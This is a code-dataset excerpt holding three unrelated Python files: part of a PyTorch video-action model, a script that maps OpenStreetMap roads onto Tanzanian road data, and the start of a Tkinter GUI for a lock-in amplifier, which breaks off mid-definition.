print(\"[Partial Batcn Norm] Freezing BatchNorm2D except the first one in base_model.\")\n for m in self.base_model.modules():\n if isinstance(m, nn.BatchNorm2d):\n count += 1\n if count >= (2 if self._enable_pbn else 1):\n m.eval()\n\n # shutdown update in frozen mode\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n\n if self.freezeBN_Eval:\n print(\"[Freezing BN] Make ALL BatchNorm2D eval mode in base_model.\")\n for m in self.base_model.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n\n # if self._enable_pbn==False: # partial batch norm\n # for m in self.base_model.modules():\n # if isinstance(m, nn.BatchNorm2d):\n\n # # shutdown update in frozen mode\n # if self.freezeBN_Require_Grad_True:\n # m.weight.requires_grad = True\n # m.bias.requires_grad = True\n # else:\n # m.weight.requires_grad = False\n # m.bias.requires_grad = False\n\n\n def partialBN(self, enable):\n self._enable_pbn = enable\n\n def get_optim_policies(self, epoch=0):\n # print (self.freezeBackbone)\n # asdf\n if self.freezeBackbone is False and self.CustomPolicy is False:\n first_conv_weight = []\n first_conv_bias = []\n normal_weight = []\n normal_bias = []\n bn = []\n\n conv_cnt = 0\n bn_cnt = 0\n for name, m in self.named_modules():\n # print (name, type(m))\n # if(name=='base_model'):\n # conv_cnt = 0\n # bn_cnt = 0\n print (name, m)\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d):\n ps = list(m.parameters())\n conv_cnt += 1\n if conv_cnt == 1:\n first_conv_weight.append(ps[0])\n if len(ps) == 2:\n first_conv_bias.append(ps[1])\n else:\n normal_weight.append(ps[0])\n if len(ps) == 2:\n normal_bias.append(ps[1])\n elif isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n normal_weight.append(ps[0])\n if len(ps) == 2:\n normal_bias.append(ps[1])\n elif isinstance(m, torch.nn.modules.rnn.LSTM):\n # print (m)\n # print (list(m.parameters()))\n # print (len(list(m.parameters())))\n ps = list(m.parameters())\n normal_weight.append(ps[0])\n normal_weight.append(ps[1])\n if len(ps) == 4:\n normal_bias.append(ps[2])\n normal_bias.append(ps[3])\n\n elif isinstance(m, torch.nn.BatchNorm1d):\n bn.extend(list(m.parameters()))\n elif isinstance(m, torch.nn.BatchNorm2d):\n bn_cnt += 1\n # later BN's are frozen\n # if not self._enable_pbn or bn_cnt == 1 or (self.freezeBN_Require_Grad_True is True):\n if not self._enable_pbn or bn_cnt == 1:\n bn.extend(list(m.parameters()))\n elif len(m._modules) == 0:\n if len(list(m.parameters())) > 0:\n raise ValueError(\"New atomic module type: {}. Need to give it a learning policy\".format(type(m)))\n\n\n # if self.consensus_type in ['MemNN']:\n return [\n {'params': first_conv_weight, 'lr_mult': 5 if self.modality == 'Flow' else 1, 'decay_mult': 1,\n 'name': \"first_conv_weight\"},\n {'params': first_conv_bias, 'lr_mult': 10 if self.modality == 'Flow' else 2, 'decay_mult': 0,\n 'name': \"first_conv_bias\"},\n {'params': normal_weight, 'lr_mult': 1, 'decay_mult': 1,\n 'name': \"normal_weight\"},\n {'params': normal_bias, 'lr_mult': 2, 'decay_mult': 0,\n 'name': \"normal_bias\"},\n {'params': bn, 'lr_mult': 1, 'decay_mult': 0,\n 'name': \"BN scale/shift\"},\n ]\n\n elif self.freezeBackbone is False and self.CustomPolicy:\n backbone_weight = []\n backbone_bias = []\n consensus_weight = []\n consensus_bias = []\n curr_hop1_weight = []\n curr_hop1_bias = []\n curr_hop2_weight = []\n curr_hop2_bias = []\n curr_hop3_weight = []\n curr_hop3_bias = []\n curr_classifier_weight = []\n curr_classifier_bias = []\n bn = []\n bn_cnt = 0\n\n for name, m in self.named_modules():\n # print (name, type(m))\n if epoch==0: print (name, m)\n if((('Curriculum_hop1' in name) or ('query_embedding1' in name) or ('KeyEmbedding1' in name) or ('ValueEmbedding1' in name)) and self.Curriculum):\n print (name, 'is in Curriculum_hop1')\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d) or isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n curr_hop1_weight.append(ps[0])\n if len(ps) == 2: curr_hop1_bias.append(ps[1])\n elif((('Curriculum_hop2' in name or ('query_embedding2' in name) or ('KeyEmbedding2' in name) or ('ValueEmbedding2' in name)) and self.Curriculum)):\n print (name, 'is in Curriculum_hop2')\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d) or isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n curr_hop2_weight.append(ps[0])\n if len(ps) == 2: curr_hop2_bias.append(ps[1])\n elif((('Curriculum_hop3' in name or ('query_embedding3' in name) or ('KeyEmbedding3' in name) or ('ValueEmbedding3' in name)) and self.Curriculum)):\n print (name, 'is in Curriculum_hop3')\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d) or isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n curr_hop3_weight.append(ps[0])\n if len(ps) == 2: curr_hop3_bias.append(ps[1])\n elif((('classifier' in name) and self.Curriculum)):\n print (name, 'is in classifier')\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d) or isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n curr_classifier_weight.append(ps[0])\n if len(ps) == 2: curr_classifier_bias.append(ps[1])\n elif('consensus' in name):\n print (name, 'is in Consensus')\n \n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d):\n ps = list(m.parameters())\n consensus_weight.append(ps[0])\n if len(ps) == 2: consensus_bias.append(ps[1])\n elif isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n consensus_weight.append(ps[0]) \n if len(ps) == 2: consensus_bias.append(ps[1])\n elif isinstance(m, torch.nn.modules.rnn.LSTM):\n ps = list(m.parameters())\n consensus_weight.append(ps[0])\n consensus_weight.append(ps[1])\n if len(ps) == 4:\n consensus_bias.append(ps[2])\n consensus_bias.append(ps[3])\n\n elif isinstance(m, torch.nn.BatchNorm1d):\n bn.extend(list(m.parameters()))\n elif isinstance(m, torch.nn.BatchNorm2d):\n bn_cnt += 1\n # later BN's are frozen\n # if not self._enable_pbn or bn_cnt == 1 and self.freezeBN is False:\n # if not self._enable_pbn or bn_cnt == 1 or (self.freezeBN_Require_Grad_True is True):\n if not self._enable_pbn or bn_cnt == 1:\n bn.extend(list(m.parameters()))\n elif len(m._modules) == 0:\n if len(list(m.parameters())) > 0:\n raise ValueError(\"New atomic module type: {}. Need to give it a learning policy\".format(type(m)))\n\n elif('base_model' in name):\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d):\n ps = list(m.parameters())\n backbone_weight.append(ps[0])\n if len(ps) == 2: backbone_bias.append(ps[1])\n elif isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n backbone_weight.append(ps[0])\n if len(ps) == 2: backbone_bias.append(ps[1])\n elif isinstance(m, torch.nn.modules.rnn.LSTM):\n ps = list(m.parameters())\n backbone_weight.append(ps[0])\n backbone_weight.append(ps[1])\n if len(ps) == 4:\n backbone_bias.append(ps[2])\n backbone_bias.append(ps[3])\n\n elif isinstance(m, torch.nn.BatchNorm1d):\n bn.extend(list(m.parameters()))\n elif isinstance(m, torch.nn.BatchNorm2d):\n bn_cnt += 1\n # later BN's are frozen\n # if not self._enable_pbn or bn_cnt == 1 and self.freezeBN is False:\n # if not self._enable_pbn or bn_cnt == 1 or (self.freezeBN_Require_Grad_True is True):\n if not self._enable_pbn or bn_cnt == 1:\n # print (name, 'is in BN')\n bn.extend(list(m.parameters()))\n elif len(m._modules) == 0:\n if len(list(m.parameters())) > 0:\n raise ValueError(\"New atomic module type: {}. Need to give it a learning policy\".format(type(m)))\n # asdf\n\n backbone_lr_mul = 0.1\n classifier_multiplier = 1\n if self.Curriculum:\n if epoch >= self.lr_steps[2]: # 15, 30, 40, 50\n classifier_multiplier = 50\n elif epoch >= self.lr_steps[3]:\n classifier_multiplier = 100\n return [\n {'params': backbone_weight, 'lr_mult': 5 if self.modality == 'Flow' else backbone_lr_mul, 'decay_mult': 1,\n 'name': \"backbone_weight\"},\n {'params': backbone_bias, 'lr_mult': 10 if self.modality == 'Flow' else backbone_lr_mul*2, 'decay_mult': 0,\n 'name': \"backbone_bias\"},\n {'params': consensus_weight, 'lr_mult': 1, 'decay_mult': 1,\n 'name': \"consensus_weight\"},\n {'params': consensus_bias, 'lr_mult': 2, 'decay_mult': 0,\n 'name': \"consensus_bias\"},\n\n {'params': curr_hop1_weight, 'lr_mult': 10, 'decay_mult': 1,\n 'name': \"curr_hop1_weight\"},\n {'params': curr_hop1_bias, 'lr_mult': 20, 'decay_mult': 0,\n 'name': \"curr_hop1_bias\"},\n\n {'params': curr_hop2_weight, 'lr_mult': 50, 'decay_mult': 1,\n 'name': \"curr_hop2_weight\"},\n {'params': curr_hop2_bias, 'lr_mult': 100, 'decay_mult': 0,\n 'name': \"curr_hop2_bias\"},\n\n {'params': curr_hop3_weight, 'lr_mult': 100, 'decay_mult': 1,\n 'name': \"curr_hop3_weight\"},\n {'params': curr_hop3_bias, 'lr_mult': 200, 'decay_mult': 0,\n 'name': \"curr_hop3_bias\"},\n\n {'params': curr_classifier_weight, 'lr_mult': classifier_multiplier, 'decay_mult': 1,\n 'name': \"curr_classifier_weight\"},\n {'params': curr_classifier_bias, 'lr_mult': classifier_multiplier*2, 'decay_mult': 0,\n 'name': \"curr_classifier_bias\"},\n\n {'params': bn, 'lr_mult': 1, 'decay_mult': 0,\n 'name': \"BN scale/shift\"},\n ]\n\n elif self.freezeBackbone:\n normal_weight = []\n normal_bias = []\n bn = []\n # normal_weight_name = []\n # normal_bias_name = []\n # bn_name = []\n\n for name, m in self.named_modules():\n print (name, type(m))\n if('consensus' in name) or (isinstance(m, torch.nn.Linear)):\n print ('--------------------------------------------', name, m, '--------------------------------------------')\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d):\n ps = list(m.parameters())\n normal_weight.append(ps[0])\n # normal_weight_name.append(name)\n if len(ps) == 2:\n normal_bias.append(ps[1])\n # normal_bias_name.append(name)\n elif isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n normal_weight.append(ps[0])\n # normal_weight_name.append(name)\n if len(ps) == 2:\n normal_bias.append(ps[1])\n # normal_bias_name.append(name)\n elif isinstance(m, torch.nn.modules.rnn.LSTM):\n ps = list(m.parameters())\n normal_weight.append(ps[0])\n normal_weight.append(ps[1])\n if len(ps) == 4:\n normal_bias.append(ps[2])\n normal_bias.append(ps[3])\n\n elif isinstance(m, torch.nn.BatchNorm1d):\n bn.extend(list(m.parameters()))\n # bn_name.extend(name)\n elif isinstance(m, torch.nn.BatchNorm2d):\n # if not self._enable_pbn and self.freezeBN is False:\n # if not self._enable_pbn and self.freezeBN_Require_Grad_True is True:\n if not self._enable_pbn:\n bn.extend(list(m.parameters()))\n # bn_name.extend(name)\n elif len(m._modules) == 0:\n if len(list(m.parameters())) > 0:\n raise ValueError(\"New atomic module type: {}. Need to give it a learning policy\".format(type(m)))\n # print ('------------------------')\n # print (normal_weight_name)\n # print (normal_bias_name)\n # print (bn_name)\n # asdf\n\n return [\n {'params': normal_weight, 'lr_mult': 1, 'decay_mult': 1,\n 'name': \"normal_weight\"},\n {'params': normal_bias, 'lr_mult': 2, 'decay_mult': 0,\n 'name': \"normal_bias\"},\n {'params': bn, 'lr_mult': 1, 'decay_mult': 0,\n 'name': \"BN scale/shift\"},\n ]\n\n def Generate_grid(self, bs, temporal_length, size):\n oneset = []\n for t in range(temporal_length):\n tmap = torch.zeros(size) + t\n tmap = tmap / float(temporal_length)\n y = 0\n hmap = torch.arange(start=y, end=y+size[0]).view(-1,1).repeat(1,size[1]).float()\n hmap = hmap / 224.\n x = 0\n wmap = torch.arange(start=x, end=x+size[1]).view(1,-1).repeat(size[0], 1).float()\n wmap = wmap / 224.\n # print (torch.stack([tmap, hmap, wmap], dim=0))\n oneset.append(torch.stack([tmap, hmap, wmap], dim=0)) # 3, 224, 224\n # grid = torch.stack([tmap, hmap, wmap], dim=0)\n oneset = torch.stack(oneset,dim=0) # 8, 3, 224, 224\n allgrids = oneset.repeat(bs, 1, 1, 1) # bs*num_seg, 3, 224, 224\n # print (allgrids.view((bs, -1, 3) + size)) # bs, num_seg, 3, 224, 224\n # asdf\n\n return torch.autograd.Variable(allgrids.cuda())\n\n def forward(self, input, criterion, phase='eval', target=None, eval=False, epoch=None):\n # print (input.size()) # [72, 6, 224, 224] # [BS, num_seg * num_channel, h, w]\n\n sample_len = (3 if self.modality == \"RGB\" else 2) * self.new_length\n # new_length is 1 when RGB, otherwise 5\n\n if self.modality == 'RGBDiff':\n sample_len = 3 * self.new_length\n input = self._get_diff(input)\n\n # print (input.view((-1, sample_len) + input.size()[-2:]).size()) # (BS * num_seg, num_channel, h, w)\n if self.CC == False:\n base_out = self.base_model(input.view((-1, sample_len) + input.size()[-2:])) # BS * num_seg, num_channel, h, w\n # print (self.base_model)\n # print ('input size : ', input.view((-1, sample_len) + input.size()[-2:]).size()) # [120, 3, 224, 224]\n # print ('output size : ', base_out.size()) # [120, 2048]\n if self.consensus_type in ['MemNN'] and self.memory_dim==1:\n base_out = base_out.unsqueeze(-1)\n base_out = base_out.unsqueeze(-1)\n elif self.CC:\n # print (input.size()) # [bs, channel(3)*num_seg(8), 224, 224]\n # print (input.view((-1, sample_len) + input.size()[-2:]).size()) # [bs*num_seg(8), 3, 224, 224]\n first_conv_out = self.base_model_first_conv(input.view((-1, sample_len) + input.size()[-2:])) # 240, 64, 112, 112\n\n cc_grid = self.Generate_grid(input.size()[0], self.num_segments, (input.size()[2], input.size()[3])) # bs*num_seg(8), 3, 224, 224\n cc_out = self.base_model_cc(cc_grid) # 240, 64, 112, 112\n\n summation = first_conv_out + cc_out # 240, 64, 112, 112)\n\n base_out = self.base_model(summation) # 120(bs*num_seg), last_fc_dim, 1, 1 (1024 for BNInception, 2048 for ResNet50) # (bs*num_seg, last_feature_dim, 7, 7)\n # if self.consensus_type not in ['MemNN']:\n # base_out = base_out.squeeze(2)\n # base_out = base_out.squeeze(2)\n\n # print (self.base_model)\n # print ('input size : ', summation.size()) # [120, 64, 112, 112]\n # print ('output size : ', base_out.size()) # [120, 2048, 1, 1]\n\n\n if self.dropout > 0 and self.new_fc is not None:\n base_out = self.new_fc(base_out) # img_feature_dim\n # print (base_out.size()) # (BS * num_seg, img_feature_dim_OR_final_class_num)\n # base_out is class_logit when TSN, otherwise img_feature_dim when TRN\n\n # print (self.before_softmax) # True\n if not self.before_softmax:\n base_out = self.softmax(base_out)\n\n if self.reshape:\n base_out = base_out.view((-1, self.num_segments) + base_out.size()[1:])\n # ^^ bf : (BS * NUM_SEG, img_feature_dim_OR_final_class_num), (BS * NUM_SEG, img_feature_dim_OR_final_class_num, H, W)\n # ^^ af : (BS, NUM_SEG, img_feature_dim_OR_final_class_num), (BS, NUM_SEG, img_feature_dim_OR_final_class_num, H, W)\n\n\n # outputs : list of outputs of each prediction_branch (logits)\n if self.consensus_type in ['MemNN']:\n if eval:\n if self.how_many_objects == 2:\n outputs, attentions, attentions_2 = self.consensus(base_out, eval=eval, epoch=epoch) # output : logit\n else:\n outputs, attentions = self.consensus(base_out, eval=eval, epoch=epoch) # output : logit\n else:\n outputs = self.consensus(base_out, eval=eval, epoch=epoch) # output : logit\n else:\n outputs = [self.consensus(base_out).squeeze(1)]\n\n # Calculate Loss (Avg MultiStage Loss)\n total_loss = None\n total_output = None\n for idx, output in enumerate(outputs): # outputs : list of logits\n if total_loss is None:\n # output.size() : \n # target.size() : \n total_loss = criterion(output, target)\n total_output = nn.functional.softmax(output,1) # BS x 174\n else:\n total_loss += criterion(output, target)\n total_output += nn.functional.softmax(output,1) # BS x 174\n # print (idx, criterion(output, target))\n\n total_output = total_output / len(outputs)\n total_loss = total_loss / len(outputs)\n\n\n # if eval:\n # print (total_output, attentions, total_loss)\n # else:\n # print (total_output, total_loss)\n \n # total_loss = total_loss.mean()\n if eval and self.consensus_type in ['MemNN']:\n if self.how_many_objects == 2:\n return total_output, attentions, attentions_2, total_loss\n return total_output, attentions, total_loss\n else:\n return total_output, total_loss\n\n def _get_diff(self, input, keep_rgb=False):\n input_c = 3 if self.modality in [\"RGB\", \"RGBDiff\"] else 2\n input_view = input.view((-1, self.num_segments, self.new_length + 1, input_c,) + input.size()[2:])\n if keep_rgb:\n new_data = input_view.clone()\n else:\n new_data = input_view[:, :, 1:, :, :, :].clone()\n\n for x in reversed(list(range(1, self.new_length + 1))):\n if keep_rgb:\n new_data[:, :, x, :, :, :] = input_view[:, :, x, :, :, :] - input_view[:, :, x - 1, :, :, :]\n else:\n new_data[:, :, x - 1, :, :, :] = input_view[:, :, x, :, :, :] - input_view[:, :, x - 1, :, :, :]\n\n return new_data\n\n\n def _construct_flow_model(self, base_model):\n # modify the convolution layers\n # Torch models are usually defined in a hierarchical way.\n # nn.modules.children() return all sub modules in a DFS manner\n modules = list(self.base_model.modules())\n first_conv_idx = list(filter(lambda x: isinstance(modules[x], nn.Conv2d), list(range(len(modules)))))[0]\n conv_layer = modules[first_conv_idx]\n container = modules[first_conv_idx - 1]\n\n # modify parameters, assume the first blob contains the convolution kernels\n params = [x.clone() for x in conv_layer.parameters()]\n kernel_size = params[0].size()\n new_kernel_size = kernel_size[:1] + (2 * self.new_length, ) + kernel_size[2:] # change number of channels\n new_kernels = params[0].data.mean(dim=1, keepdim=True).expand(new_kernel_size).contiguous()\n\n new_conv = nn.Conv2d(2 * self.new_length, conv_layer.out_channels,\n conv_layer.kernel_size, conv_layer.stride, conv_layer.padding,\n bias=True if len(params) == 2 else False)\n new_conv.weight.data = new_kernels\n if len(params) == 2:\n new_conv.bias.data = params[1].data # add bias if neccessary\n layer_name = list(container.state_dict().keys())[0][:-7] # remove .weight suffix to get the layer name\n\n # replace the first convlution layer\n setattr(container, layer_name, new_conv)\n return base_model\n\n def _construct_diff_model(self, base_model, keep_rgb=False):\n # modify the convolution layers\n # Torch models are usually defined in a hierarchical way.\n # nn.modules.children() return all sub modules in a DFS manner\n modules = list(self.base_model.modules())\n first_conv_idx = filter(lambda x: isinstance(modules[x], nn.Conv2d), list(range(len(modules))))[0]\n conv_layer = modules[first_conv_idx]\n container = modules[first_conv_idx - 1]\n\n # modify parameters, assume the first blob contains the convolution kernels\n params = [x.clone() for x in conv_layer.parameters()]\n kernel_size = params[0].size()\n if not keep_rgb:\n new_kernel_size = kernel_size[:1] + (3 * self.new_length,) + kernel_size[2:]\n new_kernels = params[0].data.mean(dim=1, keepdim=True).expand(new_kernel_size).contiguous()\n else:\n new_kernel_size = kernel_size[:1] + (3 * self.new_length,) + kernel_size[2:]\n new_kernels = torch.cat((params[0].data, params[0].data.mean(dim=1, keepdim=True).expand(new_kernel_size).contiguous()),\n 1)\n new_kernel_size = kernel_size[:1] + (3 + 3 * self.new_length,) + kernel_size[2:]\n\n new_conv = nn.Conv2d(new_kernel_size[1], conv_layer.out_channels,\n conv_layer.kernel_size, conv_layer.stride, conv_layer.padding,\n bias=True if len(params) == 2 else False)\n new_conv.weight.data = new_kernels\n if len(params) == 2:\n new_conv.bias.data = params[1].data # add bias if neccessary\n layer_name = list(container.state_dict().keys())[0][:-7] # remove .weight suffix to get the layer name\n\n # replace the first convolution layer\n setattr(container, layer_name, new_conv)\n return base_model\n\n @property\n def crop_size(self):\n return self.input_size\n\n @property\n def scale_size(self):\n return self.input_size * 256 // 224\n\n def get_augmentation(self):\n if self.modality == 'RGB':\n scales = [1, .875, .75, .66]\n max_distort = 1\n if self.image_resolution==320:\n scales = list(np.linspace(1,0.71,15)) # (320~224)\n max_distort = 5\n # if self.image_resolution==320: scales = [1, .9, .85, .8, 0.7]\n return torchvision.transforms.Compose([GroupRandomScaleCrop(self.input_size, scales, fix_crop=False, max_distort=max_distort)])\n # return torchvision.transforms.Compose([GroupMultiScaleCrop(self.input_size, scales, fix_crop=False)])\n # , GroupRandomHorizontalFlip(is_flow=False)])\n elif self.modality == 'Flow':\n return torchvision.transforms.Compose([GroupMultiScaleCrop(self.input_size, [1, .875, .75], fix_crop=False)])\n # ,GroupRandomHorizontalFlip(is_flow=True)])\n elif self.modality == 'RGBDiff':\n return torchvision.transforms.Compose([GroupMultiScaleCrop(self.input_size, [1, .875, .75], fix_crop=False)])\n # ,GroupRandomHorizontalFlip(is_flow=False)])","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":37788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"263139740","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 5 14:15:54 2017\n\n@author: cenv0574\n\"\"\"\n\nimport networkx as nx\nimport os\nimport numpy as np\nimport json\nimport pandas as pd\nimport geopandas as gpd\nimport shapely.wkt\nimport shapely.ops\n\ndef get_path(n0, n1,sg):\n \"\"\"If n0 and n1 are connected nodes in the graph, this function\n return an array of point coordinates along the road linking\n these two nodes.\"\"\"\n return np.array(json.loads(sg[n0][n1]['Json'])['coordinates'])\n\nEARTH_R = 6372.8\ndef geocalc(lat0, lon0, lat1, lon1):\n \"\"\"Return the distance (in km) between two points in\n geographical coordinates.\"\"\"\n lat0 = np.radians(lat0)\n lon0 = np.radians(lon0)\n lat1 = np.radians(lat1)\n lon1 = np.radians(lon1)\n dlon = lon0 - lon1\n y = np.sqrt(\n (np.cos(lat1) * np.sin(dlon)) ** 2\n + (np.cos(lat0) * np.sin(lat1)\n - np.sin(lat0) * np.cos(lat1) * np.cos(dlon)) ** 2)\n x = np.sin(lat0) * np.sin(lat1) + \\\n np.cos(lat0) * np.cos(lat1) * np.cos(dlon)\n c = np.arctan2(y, x)\n return EARTH_R * c\n\ndef get_path_length(path):\n return np.sum(geocalc(path[1:,0], path[1:,1],\n path[:-1,0], path[:-1,1]))\n\ndef get_full_path(path,sg):\n \"\"\"Return the positions along a path.\"\"\"\n p_list = []\n curp = None\n for i in range(len(path)-1):\n p = get_path(path[i], path[i+1],sg)\n if curp is None:\n curp = p\n if np.sum((p[0]-curp)**2) > np.sum((p[-1]-curp)**2):\n p = p[::-1,:]\n p_list.append(p)\n curp = p[-1]\n return np.vstack(p_list)\n\nif __name__ == \"__main__\":\n\n# =============================================================================\n# # set basics and give version number\n# =============================================================================\n infra_type = 'highway'\n \n base_path = os.path.join(os.path.dirname(__file__), '..')\n country_data_dir = os.path.join(base_path,'input_data')\n \n # give version:\n version = 'v5'\n# =============================================================================\n# # load tanzania data from OSM \n# =============================================================================\n \n country = 'tanzania'\n country_path_in = os.path.join(country_data_dir,'%s-%s-tr.shp' % (country,infra_type))\n country_path_2 = os.path.join(base_path,'calc','%s-%s.shp' % (country,infra_type))\n country_path_out = os.path.join(base_path,'output_data','tanroads_all_2017_%s.shp' % (version))\n\n# =============================================================================\n# give the dataset max speeds based on the given weights in the extract_osm function\n# =============================================================================\n gpd_country = gpd.read_file(country_path_in)\n weights = {1: '80', 2:'60', 3: '50', 4:'40',5:'40'}\n gpd_country['speed'] = gpd_country['weight'].map(lambda x: np.int(weights[x]))\n gpd_country.crs = {'init' :'epsg:4326'}\n gpd_country.to_file(country_path_2)\n \n# =============================================================================\n# # load country graph\n# =============================================================================\n g = nx.read_shp(country_path_2)\n sg = max(nx.connected_component_subgraphs(g.to_undirected()), key=len)\n\n# =============================================================================\n# # read nodes\n# =============================================================================\n nodes = np.array(sg.nodes())\n\n# =============================================================================\n# # get dict with all the nodes \n# =============================================================================\n pos = {k: v for k,v in enumerate(sg.nodes())}\n\n# =============================================================================\n# # load nodes from tanroads\n# =============================================================================\n node_path = os.path.join(base_path,'input_data','nodes_2017.shp')\n nodes_tanroads = gpd.read_file(node_path)\n \n# =============================================================================\n# # Load tanroads all\n# =============================================================================\n tanroads_path = os.path.join(base_path,'calc','tanroads_all_2017.shp')\n tanroads_2017 = gpd.read_file(tanroads_path) \n tanroads_2017.geometry\n combi_routes = list(zip(list(tanroads_2017.startumber),list(tanroads_2017.endnoumber)))\n \n# =============================================================================\n# # Compute the length of the road segments.\n# =============================================================================\n for n0, n1 in sg.edges():\n path = get_path(n0, n1,sg)\n distance = get_path_length(path)\n sg[n0][n1]['distance'] = distance\n sg[n0][n1]['t_time'] = distance/sg[n0][n1]['speed'] \n \n# =============================================================================\n# MAIN CALCULATION: find and compare geometries between osm and tanroads\n# =============================================================================\n inb_shortest = {}\n count = 0\n failures = []\n for route in combi_routes: \n try:\n origin = np.array(nodes_tanroads[nodes_tanroads['NodeNumber'] == route[0]].geometry.y)[0],np.array(nodes_tanroads[nodes_tanroads['NodeNumber'] == route[0]].geometry.x)[0]\n destination = np.array(nodes_tanroads[nodes_tanroads['NodeNumber'] == route[1]].geometry.y)[0],np.array(nodes_tanroads[nodes_tanroads['NodeNumber'] == route[1]].geometry.x)[0]\n \n pos0_i = np.argmin(np.sum((nodes[:,::-1] - origin)**2, axis=1))\n pos1_i = np.argmin(np.sum((nodes[:,::-1] - destination)**2, axis=1)) \n\n # Compute the shortest path.\n path = nx.shortest_path(sg,\n source=tuple(nodes[pos0_i]),\n target=tuple(nodes[pos1_i]),\n weight='distance')\n \n roads = pd.DataFrame([sg[path[i]][path[i + 1]]\n for i in range(len(path) - 1)],\n columns=['osm_id', 'name','Wkt',\n 'highway', 'weight','t_time','distance'])\n \n \n roads['geometry'] = roads['Wkt'].map(shapely.wkt.loads)\n roads.drop('Wkt', axis=1,inplace=True) \n lines = shapely.ops.linemerge(list(roads.geometry))\n get_index = tanroads_2017.query('startumber == %s and endnoumber == %s' % (route[0],route[1])).index[0]\n distance = roads['distance'].sum()\n distance_tr = get_path_length(np.array(list(tanroads_2017.loc[get_index].geometry.coords)))\n\n# =============================================================================\n# update geodataframe based on difference in distance. If osm is shorter, use osm\n# =============================================================================\n if distance < distance_tr: \n inb_shortest[route] = lines\n else:\n inb_shortest[route] = tanroads_2017.loc[get_index].geometry\n except:\n failures.append(route)\n count += 1\n get_index = tanroads_2017.query('startumber == %s and endnoumber == %s' % (route[0],route[1])).index[0]\n inb_shortest[route] = tanroads_2017.loc[get_index].geometry\n\n# =============================================================================\n# and create a list of the geometries with all the new routes\n# =============================================================================\n inb_list = [] \n for route in combi_routes: \n inb_list.append(inb_shortest[route])\n\n# =============================================================================\n# and save to new file\n# =============================================================================\n tanroads_2017['geometry'] = inb_list\n tanroads_2017.to_file(country_path_out)\n\n\n \n ","sub_path":"scripts/1_preprocess/network/map_osm_tanroads.py","file_name":"map_osm_tanroads.py","file_ext":"py","file_size_in_byte":8182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"495700491","text":"from Tkinter import *\nimport tkMessageBox\n\nfrom lib.tkValidatingEntry import *\n\nmenu_font_type = (\"Helvetica\"\t, 11, 'normal')\t# font description\nmenu_font_type2 = (\"Verdana\"\t, 12, 'normal')\t# font description\noption_menu_width = 16\n\nPRE_AMP_GAIN \t= ['1', '10', '100']\n\nPOST_AMP_GAIN \t= ['1', '10', '100']\n\nINTG_TIME_CONST \t= ['1s', '10ms', '100us']\n\ndef app_xlia(master):\n\tif master == None:\n\t\treturn None\n\toAppXLIA = XLIAGui(master)\n\treturn oAppXLIA \n\nclass XLIAGui:\n\tdef __init__(self, master):\n\t\tself.master = master\n\t\t#self.master.title('Xplore Lock-in Amplifier')\n\t\tself._createWidgets()\n\t\treturn\n\n\tdef _createWidgets(self):\n\t\tself.master.config(padx=4,pady=4)\n\t\t\n\t\tself.mainmenu = Menu(self.master, font=menu_font_type)\n\t\tself.mainmenu.config(borderwidth=1)\n\t\tself.master.config(menu=self.mainmenu)\n\t\t\n\t\tself.filemenu = Menu(self.mainmenu, font=menu_font_type)\n\t\tself.filemenu.config(tearoff=0)\n\t\t\n\t\tself.settingmenu = Menu(self.mainmenu, font=menu_font_type)\n\t\tself.settingmenu.config(tearoff=0)\n\t\t\n\t\tself.preAmpGainMenu = Menu(self.settingmenu, font=menu_font_type)\n\t\tself.preAmpGainMenu.config(tearoff=0)\n\t\t\n\t\tself.postAmpGainMenu = Menu(self.settingmenu, font=menu_font_type)\n\t\tself.postAmpGainMenu.config(tearoff=0)\n\t\t\n\t\tself.timeConstMenu = Menu(self.settingmenu, font=menu_font_type)\n\t\tself.timeConstMenu.config(tearoff=0)\n\t\t\n\t\t### REFERENCE ###\n\t\tself.LFRef = LabelFrame(self.master, \\\n\t\t\tpadx=8, pady=6, \\\n\t\t\ttext='Reference')\n\t\tself.LFRef.grid(row=0, column=0, sticky=N+W+E+S)\n\t\tself.LFRefAmplitude = LabelFrame(self.LFRef, \\\n\t\t\tpadx=4, pady=5, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Amplitude')\n\t\tself.LFRefAmplitude.grid(row=0, column=0, sticky=N+W+E+S)\n\t\tself.EntryRefAmplitude = IntegerEntry(self.LFRefAmplitude, \\\n\t\t\tbg='white', \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=RIGHT, \\\n\t\t\twidth=8)\n\t\tself.EntryRefAmplitude.grid(row=0, column=0, sticky=E)\n\t\tLabel(self.LFRefAmplitude, \\\n\t\t\ttext = 'mV', \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\t).grid(row=0, column=1, sticky=W)\n\n\t\tself.LFRefFrequency = LabelFrame(self.LFRef, \\\n\t\t\tpadx=4, pady=5, 